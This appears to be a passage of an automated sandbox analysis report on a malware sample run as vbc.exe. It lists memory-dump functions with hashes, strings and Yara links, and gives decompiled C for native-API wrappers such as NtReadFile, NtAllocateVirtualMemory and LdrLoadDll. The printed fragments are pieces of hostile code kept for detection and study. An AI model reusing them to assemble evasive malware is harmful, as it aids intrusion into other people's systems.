Uniqueness

Uniqueness Score: -1.00%

Function 003796A0, Relevance: 3.9, Strings: 3, Instructions: 102COMMON

Download Yara Rule

Strings

~X, xrefs: 003796F7
>QS, xrefs: 0037972B
>QS, xrefs: 00379732

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: >QS$>QS$~X
API String ID: 0-3042433045
Opcode ID: 4c4b4b9c0903a16064f6a90aa0c91fd8b0daf3987eaf1776f114d7b03e15a325
Instruction ID: 6419b4898d084095da25ddded5c18709bb58f9abd791c77215ba52b82db2cb83
Opcode Fuzzy Hash: 4c4b4b9c0903a16064f6a90aa0c91fd8b0daf3987eaf1776f114d7b03e15a325
Instruction Fuzzy Hash: 7F41E6B4E0160ADFCB58CFA9C5815AEFBF6AF88310F24C26AD419A7614D7349A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 00379440, Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

6psi, xrefs: 0037963C

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: 6psi
API String ID: 0-2424955896
Opcode ID: 3ee51f41760f12db4d959750f7569522bd4ee18bf97bce0654bf02d05fbc31ab
Instruction ID: d2ca1124d35fb2eac87541405e489caa4ac6c5233e474c43299be9bff2755853
Opcode Fuzzy Hash: 3ee51f41760f12db4d959750f7569522bd4ee18bf97bce0654bf02d05fbc31ab
Instruction Fuzzy Hash: 0C61E371E09619CFCB15CFAAC580ADEFBF6EF89310F24D52AD409B7214D3349A428B54

Uniqueness

Uniqueness Score: -1.00%

Function 00372078, Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

48?m, xrefs: 003721DD

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: 48?m
API String ID: 0-531116827
Opcode ID: ae152de0bff5bceaac3a6c7bb26306eb9b5a2c833895c6872b955e00fd02206f
Instruction ID: fe02c40399ecb90731f48bacbc37beaedcc6047937983983f662333a29b1d9ac
Opcode Fuzzy Hash: ae152de0bff5bceaac3a6c7bb26306eb9b5a2c833895c6872b955e00fd02206f
Instruction Fuzzy Hash: F0512974E05209DFCB19CFA9D9815AEFBF2BF89304F24842AD509BB354D7349A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00372088, Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

48?m, xrefs: 003721DD

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: 48?m
API String ID: 0-531116827
Opcode ID: 48caace6890d587be767ae5db81dde6353eeb574b49282bef7093980323b7c01
Instruction ID: 5b8b726e79521fa7750845531b8e793d6b27ecebbb9adbc2b9dc575992aca8a1
Opcode Fuzzy Hash: 48caace6890d587be767ae5db81dde6353eeb574b49282bef7093980323b7c01
Instruction Fuzzy Hash: 74514674E05209DFCB19CFA9D8816AEFBB6FF89300F208429D509BB350D7359A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00374490, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

n+^=, xrefs: 00374526

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: n+^=
API String ID: 0-3002452710
Opcode ID: 4b33045fb64699ca36c87cd0729c61f3e34b3b2bd9fd746f8e5c9d03525411e9
Instruction ID: f581fcb22ab89bdcf28287e59a6fde67494a4be3c19ad109bf2216fd3d5f67bb
Opcode Fuzzy Hash: 4b33045fb64699ca36c87cd0729c61f3e34b3b2bd9fd746f8e5c9d03525411e9
Instruction Fuzzy Hash: 8E210E71E046088BEB18CFABD80069EFBF7AFC9300F08C0BAC508A6265EB341555CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00377FE8, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06fed66f229f0abbfbed0b9581b51353d2ffbf491479c21047440bb6a622512
Instruction ID: 35f59b4ad5d849d1032a6b625e04c4f7b2bd41335fc49fbbf1786a26c98c020f
Opcode Fuzzy Hash: e06fed66f229f0abbfbed0b9581b51353d2ffbf491479c21047440bb6a622512
Instruction Fuzzy Hash: DC810274E512099FCB15CFA9D48499EFBF1FF89310F24C56AE419AB220DB38AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0037A2EA, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15952c8ff5ecd9426f9eef7b599f75feb15829d486336ebaae2b7ea41a69de8a
Instruction ID: aafb2565f6c5c8125c2fc70250329606c5471ec5d49a9741dca735f4460af5d3
Opcode Fuzzy Hash: 15952c8ff5ecd9426f9eef7b599f75feb15829d486336ebaae2b7ea41a69de8a
Instruction Fuzzy Hash: FB61C971D097A58FDB2ACF779855289BFF3AFC6200F18C1EAC4489A655DB300946CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00378E88, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c6928de44007122f2aa51709903e2df578f188a0b5002a0e73644e42cd5adf8
Instruction ID: b6c8b156b40854ed15b1d69b5bd43caf1e24c4fc398c32082b8faae689d6cc35
Opcode Fuzzy Hash: 0c6928de44007122f2aa51709903e2df578f188a0b5002a0e73644e42cd5adf8
Instruction Fuzzy Hash: 896156B4E04209DFCB15CFA5D4815AEFBB6BF89300F14D46AD419B7650D7389A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 004F0048, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1500d616e2b7954304b048766c333156174cf9979f07f71cf9d513309c704d
Instruction ID: 2dfc6e73a57cd39ebf2fe72f792714667010863f45bee472ad11f3b58c99f930
Opcode Fuzzy Hash: bc1500d616e2b7954304b048766c333156174cf9979f07f71cf9d513309c704d
Instruction Fuzzy Hash: 3F610A70E14219CFDB14CFA9D980AAEF7F6FB89304F14C1A6D518A7216D7349A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00379220, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0a8627114bf9549657f6b38238749cf15f0af1983e319d4098d5480df42f07
Instruction ID: 2fcda4c6a8e9472d5be1a7a79889ac0eec1062b62db3366f7eed6a5c9749575d
Opcode Fuzzy Hash: 9f0a8627114bf9549657f6b38238749cf15f0af1983e319d4098d5480df42f07
Instruction Fuzzy Hash: 8641FAB0E0520ADBDB05DFAAC5416EEFBF6BF88300F24D52AC419B7654D33896418F94

Uniqueness

Uniqueness Score: -1.00%

Function 0037F440, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4e9f7b54049f9a2299c6a391c28eca6b64225aceeda437d6cbafec2a9554b5
Instruction ID: f09ce36af83226539d2fca1626556557d362637e5b7e8913bc8b21a65ddb1c13
Opcode Fuzzy Hash: db4e9f7b54049f9a2299c6a391c28eca6b64225aceeda437d6cbafec2a9554b5
Instruction Fuzzy Hash: 6A110071E116199BDB58CFABE9406AEFBF7BBC8310F14C03AD508A7214EB305A418B91

Uniqueness

Uniqueness Score: -1.00%

Function 004F42B8, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5013d82f2723050f1d396169ef61783e6c09637efc8884480cd8960d8b2855a
Instruction ID: 964d38b7c893768facd454287f69840c1e96f653f7238c9647dfc119aeca2213
Opcode Fuzzy Hash: f5013d82f2723050f1d396169ef61783e6c09637efc8884480cd8960d8b2855a
Instruction Fuzzy Hash: 2F11C130E052598FCB018FA4C4587FFBBF0AB4A300F14907AD501B3291CB789D49DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004F42C8, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67290e1cc6afa8a8a99509c54a7cba6ac73aec31f5b6872397d685451d185c5e
Instruction ID: 8fab07d99129805c0af1d4cad42411730258e69072e2ff1e2ff906aea3fc0c3b
Opcode Fuzzy Hash: 67290e1cc6afa8a8a99509c54a7cba6ac73aec31f5b6872397d685451d185c5e
Instruction Fuzzy Hash: F8117C30E0421C8BDB14CFA5C458BFEBAF5AB8E301F14906AD501B3290CB788A84DB79

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2236 Parent PID: 3064 vbc.exeCOMMON

Executed Functions

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x004182ae
0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9
0x004182b0
0x004182b1
0x004182b3
0x004182b6
0x004182bf
0x004182bf
0x004182cf
0x004182d5
0x004182d7
0x004182d8
0x004182d9
0x004182d9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041838b
0x0041838d
0x0041838e
0x00418390
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 009300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009300CF

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00930048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00930053

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00930078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00930086

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 009307AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009307B7

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0092F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092F9FB

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

